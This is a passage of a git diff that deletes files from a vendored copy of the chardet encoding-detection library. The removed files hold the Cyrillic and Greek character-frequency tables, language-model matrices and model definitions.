-1,2,2,2,1,1,2,0,2,1,1,1,1,0,2,2,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,1, -0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0, -1,0,2,1,2,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0, -0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0, -1,0,0,0,0,2,0,1,2,1,0,1,1,1,0,1,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,1, -0,0,0,0,0,1,0,0,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1, -2,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -1,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -1,1,1,0,1,0,1,0,0,1,1,1,1,0,0,0,1,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0, -1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -1,1,0,1,1,0,1,0,1,0,0,0,0,1,1,0,1,1,0,0,0,0,0,1,0,1,1,0,1,0,0,0, -0,1,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0, -) - -Koi8rModel = { \ - 'charToOrderMap': KOI8R_CharToOrderMap, - 'precedenceMatrix': RussianLangModel, - 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, - 'charsetName': "KOI8-R" -} - -Win1251CyrillicModel = { \ - 'charToOrderMap': win1251_CharToOrderMap, - 'precedenceMatrix': RussianLangModel, - 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, - 'charsetName': "windows-1251" -} - -Latin5CyrillicModel = { \ - 'charToOrderMap': latin5_CharToOrderMap, - 'precedenceMatrix': RussianLangModel, - 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, - 'charsetName': "ISO-8859-5" -} - -MacCyrillicModel = { \ - 'charToOrderMap': macCyrillic_CharToOrderMap, - 'precedenceMatrix': RussianLangModel, - 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, - 'charsetName': "MacCyrillic" -}; - -Ibm866Model = { \ - 'charToOrderMap': IBM866_CharToOrderMap, - 'precedenceMatrix': RussianLangModel, - 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, - 'charsetName': "IBM866" -} - -Ibm855Model = { \ - 'charToOrderMap': IBM855_CharToOrderMap, - 'precedenceMatrix': RussianLangModel, - 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': constants.False, - 'charsetName': "IBM855" -} diff --git a/chardet/chardet/langcyrillicmodel.pyc b/chardet/chardet/langcyrillicmodel.pyc deleted file mode 100644 index ad465ee..0000000 Binary files a/chardet/chardet/langcyrillicmodel.pyc and /dev/null differ diff --git a/chardet/chardet/langgreekmodel.py b/chardet/chardet/langgreekmodel.py deleted file mode 100644 index 496df03..0000000 --- a/chardet/chardet/langgreekmodel.py +++ /dev/null @@ -1,225 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants - -# 255: Control characters that usually does not exist in any text -# 254: Carriage/Return -# 253: symbol (punctuation) that does not belong to word -# 252: 0 - 9 - -# Character Mapping Table: -Latin7_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253, 82,100,104, 94, 98,101,116,102,111,187,117, 92, 88,113, 85, # 40 - 79,118,105, 83, 67,114,119, 95, 99,109,188,253,253,253,253,253, # 50 -253, 72, 70, 80, 81, 60, 96, 93, 89, 68,120, 97, 77, 86, 69, 55, # 60 - 78,115, 65, 66, 58, 76,106,103, 87,107,112,253,253,253,253,253, # 70 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 80 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 90 -253,233, 90,253,253,253,253,253,253,253,253,253,253, 74,253,253, # a0 -253,253,253,253,247,248, 61, 36, 46, 71, 73,253, 54,253,108,123, # b0 -110, 31, 51, 43, 41, 34, 91, 40, 52, 47, 44, 53, 38, 49, 59, 39, # c0 - 35, 48,250, 37, 33, 45, 56, 50, 84, 57,120,121, 17, 18, 22, 15, # d0 -124, 1, 29, 20, 21, 3, 32, 13, 25, 5, 11, 16, 10, 6, 30, 4, # e0 - 9, 8, 14, 7, 2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253, # f0 -) - -win1253_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253, 82,100,104, 94, 98,101,116,102,111,187,117, 92, 88,113, 85, # 40 - 79,118,105, 83, 67,114,119, 95, 99,109,188,253,253,253,253,253, # 50 -253, 72, 70, 80, 81, 60, 96, 93, 89, 68,120, 97, 77, 86, 69, 55, # 60 - 78,115, 65, 66, 58, 76,106,103, 87,107,112,253,253,253,253,253, # 70 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 80 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 90 -253,233, 61,253,253,253,253,253,253,253,253,253,253, 74,253,253, # a0 -253,253,253,253,247,253,253, 36, 46, 71, 73,253, 54,253,108,123, # b0 -110, 31, 51, 43, 41, 34, 91, 40, 52, 47, 44, 53, 38, 49, 59, 39, # c0 - 35, 48,250, 37, 33, 45, 56, 50, 84, 57,120,121, 17, 18, 22, 15, # d0 -124, 1, 29, 20, 21, 3, 32, 13, 25, 5, 11, 16, 10, 6, 30, 4, # e0 - 9, 8, 14, 7, 2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253, # f0 -) - -# Model Table: -# total sequences: 100% -# first 512 sequences: 98.2851% -# first 1024 sequences:1.7001% -# rest sequences: 0.0359% -# negative sequences: 0.0148% -GreekLangModel = ( \ -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,3,2,2,3,3,3,3,3,3,3,3,1,3,3,3,0,2,2,3,3,0,3,0,3,2,0,3,3,3,0, -3,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,0,3,3,0,3,2,3,3,0,3,2,3,3,3,0,0,3,0,3,0,3,3,2,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0, -0,2,3,2,2,3,3,3,3,3,3,3,3,0,3,3,3,3,0,2,3,3,0,3,3,3,3,2,3,3,3,0, -2,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,2,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,0,2,1,3,3,3,3,2,3,3,2,3,3,2,0, -0,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,0,3,3,3,3,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,3,0,3,2,3,3,0, -2,0,1,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,2,3,0,0,0,0,3,3,0,3,1,3,3,3,0,3,3,0,3,3,3,3,0,0,0,0, -2,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,0,3,0,3,3,3,3,3,0,3,2,2,2,3,0,2,3,3,3,3,3,2,3,3,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,3,2,2,2,3,3,3,3,0,3,1,3,3,3,3,2,3,3,3,3,3,3,3,2,2,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,2,0,3,0,0,0,3,3,2,3,3,3,3,3,0,0,3,2,3,0,2,3,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,0,3,3,3,3,0,0,3,3,0,2,3,0,3,0,3,3,3,0,0,3,0,3,0,2,2,3,3,0,0, -0,0,1,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,2,0,3,2,3,3,3,3,0,3,3,3,3,3,0,3,3,2,3,2,3,3,2,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,2,3,2,3,3,3,3,3,3,0,2,3,2,3,2,2,2,3,2,3,3,2,3,0,2,2,2,3,0, -2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,3,0,0,0,3,3,3,2,3,3,0,0,3,0,3,0,0,0,3,2,0,3,0,3,0,0,2,0,2,0, -0,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,0,3,3,3,3,3,3,0,3,3,0,3,0,0,0,3,3,0,3,3,3,0,0,1,2,3,0, -3,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,2,0,0,3,2,2,3,3,0,3,3,3,3,3,2,1,3,0,3,2,3,3,2,1,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,3,3,0,2,3,3,3,3,3,3,0,0,3,0,3,0,0,0,3,3,0,3,2,3,0,0,3,3,3,0, -3,0,0,0,2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,0,3,3,3,3,3,3,0,0,3,0,3,0,0,0,3,2,0,3,2,3,0,0,3,2,3,0, -2,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,3,1,2,2,3,3,3,3,3,3,0,2,3,0,3,0,0,0,3,3,0,3,0,2,0,0,2,3,1,0, -2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,0,3,3,3,3,0,3,0,3,3,2,3,0,3,3,3,3,3,3,0,3,3,3,0,2,3,0,0,3,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,0,3,3,3,0,0,3,0,0,0,3,3,0,3,0,2,3,3,0,0,3,0,3,0,3,3,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,3,0,0,0,3,3,3,3,3,3,0,0,3,0,2,0,0,0,3,3,0,3,0,3,0,0,2,0,2,0, -0,0,0,0,1,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,3,0,3,0,2,0,3,2,0,3,2,3,2,3,0,0,3,2,3,2,3,3,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,3,0,0,2,3,3,3,3,3,0,0,0,3,0,2,1,0,0,3,2,2,2,0,3,0,0,2,2,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,0,3,3,3,2,0,3,0,3,0,3,3,0,2,1,2,3,3,0,0,3,0,3,0,3,3,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,2,3,3,3,0,3,3,3,3,3,3,0,2,3,0,3,0,0,0,2,1,0,2,2,3,0,0,2,2,2,0, -0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,3,0,0,2,3,3,3,2,3,0,0,1,3,0,2,0,0,0,0,3,0,1,0,2,0,0,1,1,1,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,1,0,3,0,0,0,3,2,0,3,2,3,3,3,0,0,3,0,3,2,2,2,1,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,0,3,3,3,0,0,3,0,0,0,0,2,0,2,3,3,2,2,2,2,3,0,2,0,2,2,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,2,0,0,0,0,0,0,2,3,0,2,0,2,3,2,0,0,3,0,3,0,3,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,3,2,3,3,2,2,3,0,2,0,3,0,0,0,2,0,0,0,0,1,2,0,2,0,2,0, -0,2,0,2,0,2,2,0,0,1,0,2,2,2,0,2,2,2,0,2,2,2,0,0,2,0,0,1,0,0,0,0, -0,2,0,3,3,2,0,0,0,0,0,0,1,3,0,2,0,2,2,2,0,0,2,0,3,0,0,2,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,0,2,3,2,0,2,2,0,2,0,2,2,0,2,0,2,2,2,0,0,0,0,0,0,2,3,0,0,0,2, -0,1,2,0,0,0,0,2,2,0,0,0,2,1,0,2,2,0,0,0,0,0,0,1,0,2,0,0,0,0,0,0, -0,0,2,1,0,2,3,2,2,3,2,3,2,0,0,3,3,3,0,0,3,2,0,0,0,1,1,0,2,0,2,2, -0,2,0,2,0,2,2,0,0,2,0,2,2,2,0,2,2,2,2,0,0,2,0,0,0,2,0,1,0,0,0,0, -0,3,0,3,3,2,2,0,3,0,0,0,2,2,0,2,2,2,1,2,0,0,1,2,2,0,0,3,0,0,0,2, -0,1,2,0,0,0,1,2,0,0,0,0,0,0,0,2,2,0,1,0,0,2,0,0,0,2,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,2,3,3,2,2,0,0,0,2,0,2,3,3,0,2,0,0,0,0,0,0,2,2,2,0,2,2,0,2,0,2, -0,2,2,0,0,2,2,2,2,1,0,0,2,2,0,2,0,0,2,0,0,0,0,0,0,2,0,0,0,0,0,0, -0,2,0,3,2,3,0,0,0,3,0,0,2,2,0,2,0,2,2,2,0,0,2,0,0,0,0,0,0,0,0,2, -0,0,2,2,0,0,2,2,2,0,0,0,0,0,0,2,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,2,0,0,3,2,0,2,2,2,2,2,0,0,0,2,0,0,0,0,2,0,1,0,0,2,0,1,0,0,0, -0,2,2,2,0,2,2,0,1,2,0,2,2,2,0,2,2,2,2,1,2,2,0,0,2,0,0,0,0,0,0,0, -0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0, -0,2,0,2,0,2,2,0,0,0,0,1,2,1,0,0,2,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,3,2,3,0,0,2,0,0,0,2,2,0,2,0,0,0,1,0,0,2,0,2,0,2,2,0,0,0,0, -0,0,2,0,0,0,0,2,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0, -0,2,2,3,2,2,0,0,0,0,0,0,1,3,0,2,0,2,2,0,0,0,1,0,2,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,2,0,2,0,3,2,0,2,0,0,0,0,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -0,0,2,0,0,0,0,1,1,0,0,2,1,2,0,2,2,0,1,0,0,1,0,0,0,2,0,0,0,0,0,0, -0,3,0,2,2,2,0,0,2,0,0,0,2,0,0,0,2,3,0,2,0,0,0,0,0,0,2,2,0,0,0,2, -0,1,2,0,0,0,1,2,2,1,0,0,0,2,0,0,2,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,2,1,2,0,2,2,0,2,0,0,2,0,0,0,0,1,2,1,0,2,1,0,0,0,0,0,0,0,0,0,0, -0,0,2,0,0,0,3,1,2,2,0,2,0,0,0,0,2,0,0,0,2,0,0,3,0,0,0,0,2,2,2,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,2,1,0,2,0,1,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,0,0,2, -0,2,2,0,0,2,2,2,2,2,0,1,2,0,0,0,2,2,0,1,0,2,0,0,2,2,0,0,0,0,0,0, -0,0,0,0,1,0,0,0,0,0,0,0,3,0,0,2,0,0,0,0,0,0,0,0,2,0,2,0,0,0,0,2, -0,1,2,0,0,0,0,2,2,1,0,1,0,1,0,2,2,2,1,0,0,0,0,0,0,1,0,0,0,0,0,0, -0,2,0,1,2,0,0,0,0,0,0,0,0,0,0,2,0,0,2,2,0,0,0,0,1,0,0,0,0,0,0,2, -0,2,2,0,0,0,0,2,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,2,0,0,0, -0,2,2,2,2,0,0,0,3,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,2,0,0,0,0,0,0,1, -0,0,2,0,0,0,0,1,2,0,0,0,0,0,0,2,2,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0, -0,2,0,2,2,2,0,0,2,0,0,0,0,0,0,0,2,2,2,0,0,0,2,0,0,0,0,0,0,0,0,2, -0,0,1,0,0,0,0,2,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0, -0,3,0,2,0,0,0,0,0,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,2, -0,0,2,0,0,0,0,2,2,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,2,0,2,2,1,0,0,0,0,0,0,2,0,0,2,0,2,2,2,0,0,0,0,0,0,2,0,0,0,0,2, -0,0,2,0,0,2,0,2,2,0,0,0,0,2,0,2,0,0,0,0,0,2,0,0,0,2,0,0,0,0,0,0, -0,0,3,0,0,0,2,2,0,2,2,0,0,0,0,0,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,2,0,0,0,0,0, -0,2,2,2,2,2,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1, -0,0,0,0,0,0,0,2,1,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,2,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0, -0,2,0,0,0,2,0,0,0,0,0,1,0,0,0,0,2,2,0,0,0,1,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,2,0,0,0, -0,2,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,2,0,2,0,0,0, -0,0,0,0,0,0,0,0,2,1,0,0,0,0,0,0,2,0,0,0,1,2,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -) - -Latin7GreekModel = { \ - 'charToOrderMap': Latin7_CharToOrderMap, - 'precedenceMatrix': GreekLangModel, - 'mTypicalPositiveRatio': 0.982851, - 'keepEnglishLetter': False, - 'charsetName': "ISO-8859-7" -} - -Win1253GreekModel = { \ - 'charToOrderMap': win1253_CharToOrderMap, - 'precedenceMatrix': GreekLangModel, - 'mTypicalPositiveRatio': 0.982851, - 'keepEnglishLetter': False, - 'charsetName': "windows-1253" -} diff --git a/chardet/chardet/langgreekmodel.py.bak b/chardet/chardet/langgreekmodel.py.bak deleted file mode 100644 index ec6d49e..0000000 --- a/chardet/chardet/langgreekmodel.py.bak +++ /dev/null @@ -1,225 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import constants - -# 255: Control characters that usually does not exist in any text -# 254: Carriage/Return -# 253: symbol (punctuation) that does not belong to word -# 252: 0 - 9 - -# Character Mapping Table: -Latin7_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253, 82,100,104, 94, 98,101,116,102,111,187,117, 92, 88,113, 85, # 40 - 79,118,105, 83, 67,114,119, 95, 99,109,188,253,253,253,253,253, # 50 -253, 72, 70, 80, 81, 60, 96, 93, 89, 68,120, 97, 77, 86, 69, 55, # 60 - 78,115, 65, 66, 58, 76,106,103, 87,107,112,253,253,253,253,253, # 70 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 80 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 90 -253,233, 90,253,253,253,253,253,253,253,253,253,253, 74,253,253, # a0 -253,253,253,253,247,248, 61, 36, 46, 71, 73,253, 54,253,108,123, # b0 -110, 31, 51, 43, 41, 34, 91, 40, 52, 47, 44, 53, 38, 49, 59, 39, # c0 - 35, 48,250, 37, 33, 45, 56, 50, 84, 57,120,121, 17, 18, 22, 15, # d0 -124, 1, 29, 20, 21, 3, 32, 13, 25, 5, 11, 16, 10, 6, 30, 4, # e0 - 9, 8, 14, 7, 2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253, # f0 -) - -win1253_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253, 82,100,104, 94, 98,101,116,102,111,187,117, 92, 88,113, 85, # 40 - 79,118,105, 83, 67,114,119, 95, 99,109,188,253,253,253,253,253, # 50 -253, 72, 70, 80, 81, 60, 96, 93, 89, 68,120, 97, 77, 86, 69, 55, # 60 - 78,115, 65, 66, 58, 76,106,103, 87,107,112,253,253,253,253,253, # 70 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 80 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 90 -253,233, 61,253,253,253,253,253,253,253,253,253,253, 74,253,253, # a0 -253,253,253,253,247,253,253, 36, 46, 71, 73,253, 54,253,108,123, # b0 -110, 31, 51, 43, 41, 34, 91, 40, 52, 47, 44, 53, 38, 49, 59, 39, # c0 - 35, 48,250, 37, 33, 45, 56, 50, 84, 57,120,121, 17, 18, 22, 15, # d0 -124, 1, 29, 20, 21, 3, 32, 13, 25, 5, 11, 16, 10, 6, 30, 4, # e0 - 9, 8, 14, 7, 2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253, # f0 -) - -# Model Table: -# total sequences: 100% -# first 512 sequences: 98.2851% -# first 1024 sequences:1.7001% -# rest sequences: 0.0359% -# negative sequences: 0.0148% -GreekLangModel = ( \ -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,3,2,2,3,3,3,3,3,3,3,3,1,3,3,3,0,2,2,3,3,0,3,0,3,2,0,3,3,3,0, -3,0,0,0,2,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,3,3,3,3,3,0,3,3,0,3,2,3,3,0,3,2,3,3,3,0,0,3,0,3,0,3,3,2,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0, 